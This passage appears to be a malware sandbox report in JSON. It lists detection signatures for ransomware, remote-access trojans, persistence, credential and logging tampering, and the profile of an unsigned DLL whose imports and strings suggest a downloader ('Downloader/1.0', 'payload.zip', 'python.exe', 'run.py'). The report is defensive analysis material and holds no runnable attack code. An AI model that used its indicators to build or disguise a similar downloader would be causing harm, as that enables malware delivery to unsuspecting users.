"name": "office_security",
"time": 0
},
{
"name": "accesses_office_username",
"time": 0
},
{
"name": "office_anomalous_feature",
"time": 0
},
{
"name": "office_dde_command",
"time": 0
},
{
"name": "packer_armadillo_mutex",
"time": 0
},
{
"name": "packer_armadillo_regkey",
"time": 0
},
{
"name": "persistence_ads",
"time": 0
},
{
"name": "persistence_safeboot",
"time": 0
},
{
"name": "persistence_ifeo",
"time": 0
},
{
"name": "persistence_silent_process_exit",
"time": 0
},
{
"name": "persistence_rdp_registry",
"time": 0
},
{
"name": "persistence_rdp_shadowing",
"time": 0
},
{
"name": "persistence_service",
"time": 0
},
{
"name": "persistence_shim_database",
"time": 0
},
{
"name": "powerpool_mutexes",
"time": 0
},
{
"name": "powershell_scriptblock_logging",
"time": 0
},
{
"name": "powershell_command_suspicious",
"time": 0
},
{
"name": "powershell_renamed",
"time": 0
},
{
"name": "powershell_reversed",
"time": 0
},
{
"name": "powershell_variable_obfuscation",
"time": 0
},
{
"name": "prevents_safeboot",
"time": 0
},
{
"name": "cmdline_process_discovery",
"time": 0
},
{
"name": "cryptomix_mutexes",
"time": 0
},
{
"name": "dharma_mutexes",
"time": 0
},
{
"name": "ransomware_extensions",
"time": 0.001
},
{
"name": "ransomware_files",
"time": 0.002
},
{
"name": "fonix_mutexes",
"time": 0
},
{
"name": "gandcrab_mutexes",
"time": 0
},
{
"name": "germanwiper_mutexes",
"time": 0
},
{
"name": "medusalocker_mutexes",
"time": 0
},
{
"name": "medusalocker_regkeys",
"time": 0
},
{
"name": "nemty_mutexes",
"time": 0
},
{
"name": "nemty_regkeys",
"time": 0
},
{
"name": "pysa_mutexes",
"time": 0
},
{
"name": "ransomware_radamant",
"time": 0
},
{
"name": "ransomware_recyclebin",
"time": 0
},
{
"name": "revil_mutexes",
"time": 0
},
{
"name": "ransomware_revil_regkey",
"time": 0
},
{
"name": "satan_mutexes",
"time": 0
},
{
"name": "snake_ransom_mutexes",
"time": 0
},
{
"name": "stop_ransom_mutexes",
"time": 0
},
{
"name": "stop_ransomware_cmd",
"time": 0
},
{
"name": "ransomware_stopdjvu",
"time": 0
},
{
"name": "rat_beebus_mutexes",
"time": 0
},
{
"name": "blacknet_mutexes",
"time": 0
},
{
"name": "blackrat_mutexes",
"time": 0
},
{
"name": "crat_mutexes",
"time": 0
},
{
"name": "dcrat_files",
"time": 0
},
{
"name": "dcrat_mutexes",
"time": 0
},
{
"name": "rat_fynloski_mutexes",
"time": 0
},
{
"name": "limerat_mutexes",
"time": 0
},
{
"name": "limerat_regkeys",
"time": 0
},
{
"name": "lodarat_file_behavior",
"time": 0
},
{
"name": "modirat_behavior",
"time": 0
},
{
"name": "njrat_regkeys",
"time": 0
},
{
"name": "obliquerat_files",
"time": 0
},
{
"name": "obliquerat_mutexes",
"time": 0
},
{
"name": "parallax_mutexes",
"time": 0
},
{
"name": "rat_pcclient",
"time": 0
},
{
"name": "rat_plugx_mutexes",
"time": 0
},
{
"name": "rat_poisonivy_mutexes",
"time": 0
},
{
"name": "rat_quasar_mutexes",
"time": 0
},
{
"name": "ratsnif_mutexes",
"time": 0
},
{
"name": "rat_spynet",
"time": 0
},
{
"name": "venomrat_mutexes",
"time": 0
},
{
"name": "warzonerat_files",
"time": 0
},
{
"name": "warzonerat_regkeys",
"time": 0
},
{
"name": "xpertrat_files",
"time": 0
},
{
"name": "xpertrat_mutexes",
"time": 0
},
{
"name": "rat_xtreme_mutexes",
"time": 0
},
{
"name": "recon_fingerprint",
"time": 0
},
{
"name": "remcos_files",
"time": 0
},
{
"name": "remcos_mutexes",
"time": 0
},
{
"name": "remcos_regkeys",
"time": 0
},
{
"name": "rdptcp_key",
"time": 0
},
{
"name": "uses_rdp_clip",
"time": 0
},
{
"name": "uses_remote_desktop_session",
"time": 0
},
{
"name": "removes_networking_icon",
"time": 0
},
{
"name": "removes_pinned_programs",
"time": 0
},
{
"name": "removes_security_maintenance_icon",
"time": 0
},
{
"name": "removes_startmenu_defaults",
"time": 0
},
{
"name": "removes_username_startmenu",
"time": 0
},
{
"name": "spicyhotpot_behavior",
"time": 0
},
{
"name": "sniffer_winpcap",
"time": 0
},
{
"name": "spreading_autoruninf",
"time": 0
},
{
"name": "stealth_hidden_extension",
"time": 0
},
{
"name": "stealth_hiddenreg",
"time": 0
},
{
"name": "stealth_hide_notifications",
"time": 0
},
{
"name": "stealth_webhistory",
"time": 0
},
{
"name": "sysinternals_psexec",
"time": 0
},
{
"name": "sysinternals_tools",
"time": 0
},
{
"name": "language_check_registry",
"time": 0
},
{
"name": "tampers_etw",
"time": 0
},
{
"name": "lsa_tampering",
"time": 0
},
{
"name": "tampers_powershell_logging",
"time": 0
},
{
"name": "targeted_flame",
"time": 0
},
{
"name": "territorial_disputes_sigs",
"time": 0.001
},
{
"name": "trickbot_mutex",
"time": 0
},
{
"name": "fleercivet_mutex",
"time": 0
},
{
"name": "lokibot_mutexes",
"time": 0
},
{
"name": "ursnif_behavior",
"time": 0
},
{
"name": "uses_adfind",
"time": 0
},
{
"name": "uses_ms_protocol",
"time": 0
},
{
"name": "neshta_mutexes",
"time": 0
},
{
"name": "renamer_mutexes",
"time": 0
},
{
"name": "owa_web_shell_files",
"time": 0
},
{
"name": "web_shell_files",
"time": 0
},
{
"name": "web_shell_processes",
"time": 0
},
{
"name": "dotnet_csc_build",
"time": 0
},
{
"name": "mavinject_lolbin",
"time": 0
},
{
"name": "multiple_explorer_instances",
"time": 0
},
{
"name": "script_tool_executed",
"time": 0
},
{
"name": "suspicious_certutil_use",
"time": 0
},
{
"name": "suspicious_command_tools",
"time": 0
},
{
"name": "suspicious_mpcmdrun_use",
"time": 0
},
{
"name": "suspicious_ping_use",
"time": 0
},
{
"name": "uses_powershell_copyitem",
"time": 0
},
{
"name": "uses_windows_utilities",
"time": 0
},
{
"name": "uses_windows_utilities_appcmd",
"time": 0
},
{
"name": "uses_windows_utilities_csvde_ldifde",
"time": 0
},
{
"name": "uses_windows_utilities_cipher",
"time": 0
},
{
"name": "uses_windows_utilities_clickonce",
"time": 0
},
{
"name": "uses_windows_utilities_curl",
"time": 0
},
{
"name": "uses_windows_utilities_dsquery",
"time": 0
},
{
"name": "uses_windows_utilities_esentutl",
"time": 0
},
{
"name": "uses_windows_utilities_finger",
"time": 0
},
{
"name": "uses_windows_utilities_mode",
"time": 0
},
{
"name": "uses_windows_utilities_ntdsutil",
"time": 0
},
{
"name": "uses_windows_utilities_nltest",
"time": 0
},
{
"name": "uses_windows_utilities_xcopy",
"time": 0
},
{
"name": "wmic_command_suspicious",
"time": 0
},
{
"name": "scrcons_wmi_script_consumer",
"time": 0
},
{
"name": "allaple_mutexes",
"time": 0
}
],
"reporting": [
{
"name": "BinGraph",
"time": 0
}
]
}
|
{
"category": "file",
"file": {
"name": "cf9cdd5d26283d31c43e.dll",
"path": "/opt/CAPEv2/storage/binaries/cf9cdd5d26283d31c43eb4df35a0dfc867da74441e5363890a84b988d8514c62",
"guest_paths": "",
"size": 52224,
"crc32": "F13B7F8F",
"md5": "40784dca35fa06d4c4cb932e101e56ab",
"sha1": "b105724b5bee4ad43b23cf35d8d29ff231f94aec",
"sha256": "cf9cdd5d26283d31c43eb4df35a0dfc867da74441e5363890a84b988d8514c62",
"sha512": "cecf9ae77462eacf1b71b0bfbb6a2bfe8f51b0204d97badf9429abe81f291bfdfbfc1ab074511de157d0a0fadade491256d02f1e6b4b5367f4556343705d63d1",
"rh_hash": null,
"ssdeep": "1536:9NKW7bUJASj9+gJjprSuC/q69XE4knG8z0b:fKW7bUJASj9+gJj5Yq691+0b",
"type": "PE32 executable (DLL) (GUI) Intel 80386, for MS Windows",
"yara": [],
"cape_yara": [],
"clamav": [],
"tlsh": "T1DD33E522E913D177D38D0EB0E9079E5ACE796CA6CFE071C3FB911DEA08209D5A739605",
"sha3_384": "d9349b6d5a3120cdfd315ca96ca4336c1734481ecf19375cb3cf57900eabf1bef75d803073164d4265cd2e85e643de72",
"pe": {
"guest_signers": {
"aux_sha1": null,
"aux_timestamp": null,
"aux_valid": false,
"aux_error": true,
"aux_error_desc": "No signature found.",
"aux_signers": []
},
"digital_signers": [],
"imagebase": "0x10000000",
"entrypoint": "0x00006eaf",
"ep_bytes": "558bec837d0c017505e8fb070000ff75",
"peid_signatures": null,
"reported_checksum": "0x00000000",
"actual_checksum": "0x00014291",
"osversion": "6.0",
"pdbpath": "C:\\Users\\lengo\\Desktop\\Spamming Work\\Duy\\PyApp\\workplace\\curl\\Dll1\\Release\\Dll1.pdb",
"imports": {
"KERNEL32": {
"dll": "KERNEL32.dll",
"imports": [
{
"address": "0x10008000",
"name": "CreateDirectoryW"
},
{
"address": "0x10008004",
"name": "WriteFile"
},
{
"address": "0x10008008",
"name": "TerminateProcess"
},
{
"address": "0x1000800c",
"name": "GetModuleFileNameW"
},
{
"address": "0x10008010",
"name": "WaitForSingleObject"
},
{
"address": "0x10008014",
"name": "CreateFileW"
},
{
"address": "0x10008018",
"name": "GetFileAttributesW"
},
{
"address": "0x1000801c",
"name": "Sleep"
},
{
"address": "0x10008020",
"name": "CloseHandle"
},
{
"address": "0x10008024",
"name": "CreateProcessW"
},
{
"address": "0x10008028",
"name": "GetExitCodeProcess"
},
{
"address": "0x1000802c",
"name": "UnhandledExceptionFilter"
},
{
"address": "0x10008030",
"name": "IsDebuggerPresent"
},
{
"address": "0x10008034",
"name": "InitializeSListHead"
},
{
"address": "0x10008038",
"name": "GetSystemTimeAsFileTime"
},
{
"address": "0x1000803c",
"name": "GetCurrentThreadId"
},
{
"address": "0x10008040",
"name": "GetCurrentProcessId"
},
{
"address": "0x10008044",
"name": "QueryPerformanceCounter"
},
{
"address": "0x10008048",
"name": "GetCurrentProcess"
},
{
"address": "0x1000804c",
"name": "SetUnhandledExceptionFilter"
},
{
"address": "0x10008050",
"name": "IsProcessorFeaturePresent"
}
]
},
"SHELL32": {
"dll": "SHELL32.dll",
"imports": [
{
"address": "0x10008104",
"name": "SHFileOperationW"
},
{
"address": "0x10008108",
"name": "ShellExecuteExW"
}
]
},
"ole32": {
"dll": "ole32.dll",
"imports": [
{
"address": "0x100081f8",
"name": "CoCreateInstance"
},
{
"address": "0x100081fc",
"name": "CoInitialize"
},
{
"address": "0x10008200",
"name": "CoUninitialize"
}
]
},
"OLEAUT32": {
"dll": "OLEAUT32.dll",
"imports": [
{
"address": "0x100080f0",
"name": "VariantInit"
},
{
"address": "0x100080f4",
"name": "SysFreeString"
},
{
"address": "0x100080f8",
"name": "SysAllocString"
},
{
"address": "0x100080fc",
"name": "VariantClear"
}
]
},
"MSVCP140": {
"dll": "MSVCP140.dll",
"imports": [
{
"address": "0x10008058",
"name": "??1_Lockit@std@@QAE@XZ"
},
{
"address": "0x1000805c",
"name": "??0_Lockit@std@@QAE@H@Z"
},
{
"address": "0x10008060",
"name": "?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ"
},
{
"address": "0x10008064",
"name": "?_Id_cnt@id@locale@std@@0HA"
},
{
"address": "0x10008068",
"name": "?_Xout_of_range@std@@YAXPBD@Z"
},
{
"address": "0x1000806c",
"name": "?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A"
},
{
"address": "0x10008070",
"name": "?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z"
},
{
"address": "0x10008074",
"name": "?_Xlength_error@std@@YAXPBD@Z"
},
{
"address": "0x10008078",
"name": "?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ"
},
{
"address": "0x1000807c",
"name": "??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ"
},
{
"address": "0x10008080",
"name": "?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ"
},
{
"address": "0x10008084",
"name": "?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAPAD0PAH001@Z"
},
{
"address": "0x10008088",
"name": "??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z"
},
{
"address": "0x1000808c",
"name": "?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD@Z"
},
{
"address": "0x10008090",
"name": "?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z"
},
{
"address": "0x10008094",
"name": "?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z"
},
{
"address": "0x10008098",
"name": "??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ"
},
{
"address": "0x1000809c",
"name": "??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z"
},
{
"address": "0x100080a0",
"name": "?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z"
},
{
"address": "0x100080a4",
"name": "?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z"
},
{
"address": "0x100080a8",
"name": "??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ"
},
{
"address": "0x100080ac",
"name": "??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ"
},
{
"address": "0x100080b0",
"name": "?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ"
},
{
"address": "0x100080b4",
"name": "?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ"
},
{
"address": "0x100080b8",
"name": "?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JXZ"
},
{
"address": "0x100080bc",
"name": "?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEHXZ"
},
{
"address": "0x100080c0",
"name": "?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z"
},
{
"address": "0x100080c4",
"name": "?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z"
},
{
"address": "0x100080c8",
"name": "?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEPAV12@PAD_J@Z"
},
{
"address": "0x100080cc",
"name": "?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEHXZ"
},
{
"address": "0x100080d0",
"name": "?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEXABVlocale@2@@Z"
},
{
"address": "0x100080d4",
"name": "??1?$basic_istream@DU?$char_traits@D@std@@@std@@UAE@XZ"
},
{
"address": "0x100080d8",
"name": "??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z"
},
{
"address": "0x100080dc",
"name": "??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ"
},
{
"address": "0x100080e0",
"name": "??7ios_base@std@@QBE_NXZ"
},
{
"address": "0x100080e4",
"name": "?always_noconv@codecvt_base@std@@QBE_NXZ"
},
{
"address": "0x100080e8",
"name": "?_Xbad_alloc@std@@YAXXZ"
}
]
},
"WINHTTP": {
"dll": "WINHTTP.dll",
"imports": [
{
"address": "0x1000813c",
"name": "WinHttpQueryDataAvailable"
},
{
"address": "0x10008140",
"name": "WinHttpReceiveResponse"
},
{
"address": "0x10008144",
"name": "WinHttpConnect"
},
{
"address": "0x10008148",
"name": "WinHttpSendRequest"
},
{
"address": "0x1000814c",
"name": "WinHttpOpen"
},
{
"address": "0x10008150",
"name": "WinHttpCloseHandle"
},
{
"address": "0x10008154",
"name": "WinHttpReadData"
},
{
"address": "0x10008158",
"name": "WinHttpOpenRequest"
}
]
},
"VCRUNTIME140": {
"dll": "VCRUNTIME140.dll",
"imports": [
{
"address": "0x10008110",
"name": "memmove"
},
{
"address": "0x10008114",
"name": "__CxxFrameHandler3"
},
{
"address": "0x10008118",
"name": "__std_exception_destroy"
},
{
"address": "0x1000811c",
"name": "__std_exception_copy"
},
{
"address": "0x10008120",
"name": "__std_terminate"
},
{
"address": "0x10008124",
"name": "memcpy"
},
{
"address": "0x10008128",
"name": "memset"
},
{
"address": "0x1000812c",
"name": "_CxxThrowException"
},
{
"address": "0x10008130",
"name": "__std_type_info_destroy_list"
},
{
"address": "0x10008134",
"name": "_except_handler4_common"
}
]
},
"api-ms-win-crt-stdio-l1-1-0": {
"dll": "api-ms-win-crt-stdio-l1-1-0.dll",
"imports": [
{
"address": "0x100081b8",
"name": "fputc"
},
{
"address": "0x100081bc",
"name": "_fseeki64"
},
{
"address": "0x100081c0",
"name": "_get_stream_buffer_pointers"
},
{
"address": "0x100081c4",
"name": "fread"
},
{
"address": "0x100081c8",
"name": "fflush"
},
{
"address": "0x100081cc",
"name": "fclose"
},
{
"address": "0x100081d0",
"name": "ungetc"
},
{
"address": "0x100081d4",
"name": "fgetc"
},
{
"address": "0x100081d8",
"name": "setvbuf"
},
{
"address": "0x100081dc",
"name": "fgetpos"
},
{
"address": "0x100081e0",
"name": "fwrite"
},
{
"address": "0x100081e4",
"name": "fsetpos"
}
]
},
"api-ms-win-crt-runtime-l1-1-0": {
"dll": "api-ms-win-crt-runtime-l1-1-0.dll",
"imports": [
{
"address": "0x10008188",
"name": "_cexit"
},
{
"address": "0x1000818c",
"name": "_invoke_watson"
},
{
"address": "0x10008190",
"name": "_initterm"
},
{
"address": "0x10008194",
"name": "_initterm_e"
},
{
"address": "0x10008198",
"name": "_seh_filter_dll"
},
{
"address": "0x1000819c",
"name": "_configure_narrow_argv"
},
{
"address": "0x100081a0",
"name": "_initialize_narrow_environment"
},
{
"address": "0x100081a4",
"name": "_initialize_onexit_table"
},
{
"address": "0x100081a8",
"name": "_register_onexit_function"
},
{
"address": "0x100081ac",
"name": "_execute_onexit_table"
},
{
"address": "0x100081b0",
"name": "_crt_atexit"
}
]
},
"api-ms-win-crt-filesystem-l1-1-0": {
"dll": "api-ms-win-crt-filesystem-l1-1-0.dll",
"imports": [
{
"address": "0x10008168",
"name": "_lock_file"
},
{
"address": "0x1000816c",
"name": "_wstat64i32"
},
{
"address": "0x10008170",
"name": "_unlock_file"
}
]
},
"api-ms-win-crt-convert-l1-1-0": {
"dll": "api-ms-win-crt-convert-l1-1-0.dll",
"imports": [
{
"address": "0x10008160",
"name": "strtol"
}
]
},
"api-ms-win-crt-string-l1-1-0": {
"dll": "api-ms-win-crt-string-l1-1-0.dll",
"imports": [
{
"address": "0x100081ec",
"name": "isspace"
},
{
"address": "0x100081f0",
"name": "_stricmp"
}
]
},
"api-ms-win-crt-heap-l1-1-0": {
"dll": "api-ms-win-crt-heap-l1-1-0.dll",
"imports": [
{
"address": "0x10008178",
"name": "_callnewh"
},
{
"address": "0x1000817c",
"name": "malloc"
},
{
"address": "0x10008180",
"name": "free"
}
]
}
},
"exported_dll_name": "Dll1.dll",
"exports": [
{
"address": "0x10002580",
"name": "ax",
"ordinal": 1
}
],
"dirents": [
{
"name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
"virtual_address": "0x0000b890",
"size": "0x00000040"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
"virtual_address": "0x0000b8d0",
"size": "0x00000118"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
"virtual_address": "0x0000e000",
"size": "0x000000f8"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
"virtual_address": "0x00000000",
"size": "0x00000000"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
"virtual_address": "0x00000000",
"size": "0x00000000"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
"virtual_address": "0x0000f000",
"size": "0x0000060c"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
"virtual_address": "0x0000abd8",
"size": "0x00000070"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
"virtual_address": "0x00000000",
"size": "0x00000000"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
"virtual_address": "0x00000000",
"size": "0x00000000"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_TLS",
"virtual_address": "0x00000000",
"size": "0x00000000"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
"virtual_address": "0x0000ab18",
"size": "0x00000040"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
"virtual_address": "0x00000000",
"size": "0x00000000"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_IAT",
"virtual_address": "0x00008000",
"size": "0x00000208"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
"virtual_address": "0x00000000",
"size": "0x00000000"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
"virtual_address": "0x00000000",
"size": "0x00000000"
},
{
"name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
"virtual_address": "0x00000000",
"size": "0x00000000"
}
],
"sections": [
{
"name": ".text",
"raw_address": "0x00000400",
"virtual_address": "0x00001000",
"virtual_size": "0x00006c92",
"size_of_data": "0x00006e00",
"characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
"characteristics_raw": "0x60000020",
"entropy": "6.39"
},
{
"name": ".rdata",
"raw_address": "0x00007200",
"virtual_address": "0x00008000",
"virtual_size": "0x00004b34",
"size_of_data": "0x00004c00",
"characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
"characteristics_raw": "0x40000040",
"entropy": "5.28"
},
{
"name": ".data",
"raw_address": "0x0000be00",
"virtual_address": "0x0000d000",
"virtual_size": "0x00000730",
"size_of_data": "0x00000400",
"characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
"characteristics_raw": "0xc0000040",
"entropy": "4.04"
},
{
"name": ".rsrc",
"raw_address": "0x0000c200",
"virtual_address": "0x0000e000",
"virtual_size": "0x000000f8",
"size_of_data": "0x00000200",
"characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
"characteristics_raw": "0x40000040",
"entropy": "2.51"
},
{
"name": ".reloc",
"raw_address": "0x0000c400",
"virtual_address": "0x0000f000",
"virtual_size": "0x0000060c",
"size_of_data": "0x00000800",
"characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
"characteristics_raw": "0x42000040",
"entropy": "5.59"
}
],
"overlay": null,
"resources": [
{
"name": "RT_MANIFEST",
"offset": "0x0000e060",
"size": "0x00000091",
"filetype": null,
"language": "LANG_ENGLISH",
"sublanguage": "SUBLANG_ENGLISH_US",
"entropy": "4.89"
}
],
"versioninfo": [],
"imphash": "e44ab922d75327a3c67ce12ffb001154",
"timestamp": "2025-11-08 09:48:44",
"icon": null,
"icon_hash": null,
"icon_fuzzy": null,
"icon_dhash": null,
"imported_dll_count": 13
},
"data": null,
"strings": [
".?AVexception@std@@",
".?AVtype_info@@",
".?AV?$basic_istream@DU?$char_traits@D@std@@@std@@",
".rdata$voltmd",
"__std_exception_destroy",
".?AVios_base@std@@",
"IsProcessorFeaturePresent",
")D$ 3",
"?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEPAV12@PAD_J@Z",
"_get_stream_buffer_pointers",
"_cexit",
":/:A:L:o:",
"?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEXABVlocale@2@@Z",
"8(80888@8T8\\8d8l8",
"5i5|5",
"bad cast",
"SHFileOperationW",
"9,989^9",
"Sleep",
"9Y:l:",
"?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ",
".?AVbad_alloc@std@@",
"??0_Lockit@std@@QAE@H@Z",
"fclose",
"api-ms-win-crt-filesystem-l1-1-0.dll",
"IsDebuggerPresent",
".?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@",
".CRT$XTA",
"0H1T1`1x1",
".text$yd",
"vector too long",
"isspace",
"D$`j8j",
".CRT$XIZ",
"bad allocation",
"_configure_narrow_argv",
"8F8O8W8G9':",
"_fseeki64",
".text$x",
"SetUnhandledExceptionFilter",
"?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z",
"InitializeSListHead",
"WinHttpReadData",
"?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ",
".CRT$XCL",
"ungetc",
"7L8k8q8y8",
"?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAEHXZ",
"??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ",
"9=;{<",
"WINHTTP.dll",
"6 6(60686@6L6l6x6",
"UnhandledExceptionFilter",
"pdf.pdf",
"??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ",
"WinHttpReceiveResponse",
"??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ",
".?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@",
"?_Xbad_alloc@std@@YAXXZ",
"api-ms-win-crt-heap-l1-1-0.dll",
".?AV?$basic_stringbuf@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@",
"<?xml version='1.0' encoding='UTF-8' standalone='yes'?>",
"3}496",
"run.py",
"CreateProcessW",
"?always_noconv@codecvt_base@std@@QBE_NXZ",
".?AV?$basic_ios@DU?$char_traits@D@std@@@std@@",
"5#5*5=5K5Q5W5]5c5i5p5w5~5",
"memset",
"??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z",
"6>6D6X6",
"VCRUNTIME140.dll",
".rdata$r",
"?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z",
"80959L9V9\\9b9h9n9t9z9",
"GetCurrentProcessId",
"7\"7E7X7$8=8G8a8m8r8",
"?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAPAD0PAH001@Z",
"O _^[",
"\" -o \"",
"QueryPerformanceCounter",
"output.txt",
"__std_terminate",
"?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z",
"_CxxThrowException",
"u,PPPPP",
"?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z",
".rsrc$02",
".CRT$XPZ",
"SHELL32.dll",
"??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ",
"?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z",
"WinHttpOpenRequest",
".rdata$zzzdbg",
"GetCurrentProcess",
"invalid string position",
"?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z",
".rtc$IAA",
"fread",
"5Genu",
"WriteFile",
"?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ",
">K>|>",
"setvbuf",
";T;X;`;",
".rtc$TZZ",
"_execute_onexit_table",
">7?W?o?",
"??1?$basic_istream@DU?$char_traits@D@std@@@std@@UAE@XZ",
"jjjjjj",
"_invoke_watson",
"@.data",
"?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z",
"OLEAUT32.dll",
"api-ms-win-crt-string-l1-1-0.dll",
".?AVbad_array_new_length@std@@",
".data$r",
".CRT$XPA",
"WinHttpConnect",
"0(0,0D0T0X0h0l0p0",
"GetCurrentThreadId",
".text",
".rdata",
".CRT$XIA",
"Dll1.dll",
".CRT$XCA",
"CreateFileW",
"5ntel",
"?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ",
"5J6Z6f6t6",
"> >4>8><>D>L>P>T>X>l>p>",
"payload.zip",
"WinHttpOpen",
".rdata$sxdata",
"_initialize_narrow_environment",
".CRT$XCZ",
".idata$5",
"ole32.dll",
"=D>a>i>5?",
"O8_^[",
"WinHttpQueryDataAvailable",
"WinHttpCloseHandle",
"fwrite",
"_register_onexit_function",
"q2Richz",
"<3<8<E<",
"GetModuleFileNameW",
"1>1v1",
"4#4-4",
"_initterm",
"0\"3*3",
"Downloader/1.0",
"\\zip\\python.exe",
"_unlock_file",
".edata",
".idata$6",
"fflush",
"fgetc",
"??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z",
".?AV?$basic_ifstream@DU?$char_traits@D@std@@@std@@",
"MSVCP140.dll",
"??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z",
"5T6~6",
"?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD@Z",
"strtol",
"KERNEL32.dll",
"memcpy",
"?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ",
"?D?q?",
"3/3O3`3i3",
".00cfg",
"8 8$8P:T:X:\\:`:d:h:l:p:t:x:|:",
"Unknown exception",
"000D0[0b0",
".?AV?$_Iosb@H@std@@",
".rtc$IZZ",
"_initialize_onexit_table",
"__std_exception_copy",
"https",
"RQPRQP",
"_stricmp",
"_callnewh",
"_except_handler4_common",
"??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ",
"CoUninitialize",
"malloc",
"<:<g<",
".CRT$XTZ",
"GetFileAttributesW",
"__std_type_info_destroy_list",
"WaitForSingleObject",
